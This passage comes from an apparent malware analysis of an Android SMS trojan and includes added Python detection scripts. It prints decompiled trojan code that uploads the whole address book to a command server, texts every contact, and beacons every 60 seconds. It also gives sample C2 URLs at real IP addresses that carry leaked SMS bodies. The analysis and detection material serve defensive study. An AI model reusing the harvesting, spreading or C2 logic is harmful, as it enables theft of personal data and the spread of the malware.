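    """Return (timestamp, client, decoded) for every C2 hit in the log.

    Assumed log format (constructed for this example):
        <timestamp> <client-ip> <method> <url> <status>
    """
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        ts, client, _method, url, _status = fields[:5]
        decoded = decode_c2_request(url)
        if decoded:
            hits.append((ts, client, decoded))
    return hits


# Constructed sample log. The C2 URLs are the ones captured above, with the emulator's
# default line number 15555215554 as the "victim"; the Google line is benign noise.
SAMPLE_LOG = [
    "2014-06-06T15:38:16Z 10.0.2.15 GET http://141.105.65.113/sms/SMSHandler1.ashx?t=new 200",
    "2014-06-06T15:38:20Z 10.0.2.15 GET https://android.clients.google.com/checkin 200",
    "2014-06-06T15:38:40Z 10.0.2.15 GET http://141.105.65.113/sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069070000 200",
    "2014-06-06T15:39:02Z 10.0.2.15 GET http://203.69.59.153/dong/SMSHandler.ashx?t=s&p=15555215554 200",
]

if __name__ == "__main__":
    for ts, client, hit in scan_proxy_log(SAMPLE_LOG):
        print(ts, client, hit["host"], hit["command"], "->", hit["meaning"])
        if hit["sms_body"] is not None:
            print("   leaked SMS from", hit["sms_sender"], "at", hit["sms_time"], ":", hit["sms_body"])
```

Because the exfiltration is plain HTTP GET, the full message body sits in the proxy's URL field; matching on the SMSHandler*.ashx path rather than on the IP keeps the rule valid when the operators move servers, which they did between the samples above.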

As for SMSSender, when it is started it runs the code in the Contact class:
public void Send()
  throws UnsupportedEncodingException, ParserConfigurationException, InterruptedException
{
  // Pull every contact, then stream them to the server in small comma-joined batches
  ArrayList localArrayList = new ContactsHelper(this._Context).GetAllContacts();
  WebServiceCalling localWebServiceCalling = new WebServiceCalling(this._Context);
  String str1 = Tools.getPhoneNumber(this._Context);   // the victim's own number
  String str2 = "";
  Iterator localIterator = localArrayList.iterator();
  while (true)
  {
    if (!localIterator.hasNext())
    {
      if (str2.length() > 0)
        localWebServiceCalling.SC(null, str1, str2);   // flush the final partial batch
      return;
    }
    String str3 = (String)localIterator.next();
    str2 = str2 + "," + str3;
    if (str2.length() > 20)
    {
      localWebServiceCalling.SC(null, str1, str2);     // upload a batch once it exceeds 20 characters
      str2 = "";
    }
  }
}

This part reads the address book on your phone, extracts every contact, and sends them to the remote server. The upload contains:
·                     your own phone number
·                     the contact's name
·                     the contact's phone number
It also sends SMS messages to the other contacts (str8 is the recipient number, str9 the message body, per the SmsManager.sendTextMessage signature):
localSmsManager.sendTextMessage(str8.trim(), null, str9, null, null);
  localWebServiceCalling.log("SMS", "S", str1, str8 + "|" + str9);

Every 60 seconds it sends your contact data to the remote server and texts the other contacts:

public static void sendUpdateBroadcastRepeat(Context paramContext)
{
  PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, SMSSender.class), 0);
  long l = SystemClock.elapsedRealtime();
  // 2 == AlarmManager.ELAPSED_REALTIME_WAKEUP: fires SMSSender every 60000 ms and wakes the device to do it
  ((AlarmManager)paramContext.getSystemService("alarm")).setRepeating(2, l, 60000L, localPendingIntent);
}
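A fixed 60 000 ms repeating alarm leaves an equally fixed rhythm in network logs. The added example below (not from the post) takes (epoch-seconds, host) request events and flags hosts whose inter-request gaps are nearly constant, which is how you would spot this client from a proxy or NetFlow export without any signature. The events are constructed, the hosts are the ones seen on this page, and the thresholds are this example's own choice.

```python
"""Spot the fixed-interval beacon that AlarmManager.setRepeating(..., 60000L, ...) produces.

Added example, not from the original post. Events are (epoch seconds, host)
pairs such as you would extract from a proxy log; a host is reported when its
inter-request gaps are nearly constant, regardless of the exact period.
"""
from collections import defaultdict
from statistics import median, pstdev


def beacon_candidates(events, min_events=5, max_jitter=0.1):
    """Return {host: (median_gap_seconds, jitter)} for hosts contacted at a fixed rate.

    jitter is the population stdev of the gaps divided by their median. A timer-driven
    client keeps it well under max_jitter; human-driven browsing does not.
    Both thresholds are this example's own choice.
    """
    per_host = defaultdict(list)
    for ts, host in events:
        per_host[host].append(ts)

    flagged = {}
    for host, stamps in per_host.items():
        if len(stamps) < min_events:
            continue                      # too few samples to call it periodic
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        period = median(gaps)
        if period <= 0:
            continue                      # duplicate timestamps only
        jitter = pstdev(gaps) / period
        if jitter <= max_jitter:
            flagged[host] = (period, jitter)
    return flagged


# Constructed events: the trojan's 60 s timer with a little scheduler drift,
# plus irregular benign traffic to a Google host seen in the same capture.
BASE = 1402069070
SAMPLE_EVENTS = [(BASE + 60 * i + drift, "141.105.65.113")
                 for i, drift in enumerate([0, 1, 0, 2, 1, 0, 1, 3, 0, 1])]
SAMPLE_EVENTS += [(BASE + t, "android.clients.google.com")
                  for t in [5, 9, 130, 131, 400, 1210, 1215, 1216]]

if __name__ == "__main__":
    for host, (period, jitter) in beacon_candidates(SAMPLE_EVENTS).items():
        print("beacon: %s every %.0f s (jitter %.3f)" % (host, period, jitter))
```

On real data, feed it a whole day of (timestamp, destination) pairs per client; a phone that contacts one host every minute around the clock, including while the screen is off, is worth pulling the app list from even when the destination is not yet on any blocklist.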
Also, every HTTP GET hands the response content back through a Message to the injected Handler for further processing.
new Thread(new Runnable()
{
  public void run()
  {
    try
    {
      String str = WebServiceCalling.this.callWS(paramString);
      if (paramHandler != null)
      {
        Message localMessage = new Message();
        localMessage.what = paramInt;
        localMessage.obj = str;
        paramHandler.sendMessage(localMessage);
      }
      return;
    }
    catch (UnsupportedEncodingException localUnsupportedEncodingException)
    {
      localUnsupportedEncodingException.printStackTrace();
      return;
    }
    catch (ParserConfigurationException localParserConfigurationException)
    {
      localParserConfigurationException.printStackTrace();
    }
  }
}).start();
Since the SMS text comes from the remote server, the operators can change the message being sent very quickly, and change the link it carries as the situation requires.
It also monitors your incoming calls: when a call comes in, it forwards the call to #. This is the part I don't quite understand; I'm not sure what forwarding to the # number does, whether it hangs up the call, or whether it is related to the USSD vulnerability.
-----
That is roughly the state of the virus code. Although the virus still has to be installed and run before it does anything, it is hard for ordinary users to notice that the app is a scam. Once a phone is infected the virus can read the contacts directly, so it spreads extremely fast; the rampancy of these viruses is truly frightening.